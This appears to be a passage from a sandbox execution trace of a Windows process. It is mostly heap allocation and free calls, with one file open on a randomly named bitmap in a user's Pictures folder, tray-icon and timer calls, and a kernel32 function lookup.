lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0040.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0040.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpUsedDefaultChar=0x0) returned 69 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.781] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\jmlqzshsnywrowx4c3m9.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8a) returned 0x7c3818 [0040.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=69, lpWideCharStr=0x7c3818, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp") returned 69 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.784] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.785] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 1 [0040.785] TranslateMessage (lpMsg=0x6aedfc) returned 0 [0040.785] DispatchMessageW (lpMsg=0x6aedfc) returned 0x0 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.786] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae498) returned 1 [0040.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.787] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0040.787] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0040.787] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.787] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.788] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.789] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0040.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.789] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.789] CloseHandle (hObject=0x140) returned 1 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.789] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.790] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 